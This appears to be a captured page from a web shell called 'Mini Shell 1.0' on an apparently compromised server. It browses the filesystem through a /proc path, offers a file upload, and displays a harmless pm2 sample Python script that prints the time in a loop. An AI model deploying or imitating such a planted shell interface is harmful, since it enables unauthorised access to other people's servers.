HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/1780863/root/usr/local/lib/node_modules/pm2/lib/templates/sample-apps/python-app/
Upload File :
Current File : //proc/1780863/root/usr/local/lib/node_modules/pm2/lib/templates/sample-apps/python-app/echo.py
#!/usr/bin/python
import time

while 1:
    print("Start : %s" % time.ctime())
    print("second line")
    time.sleep(1)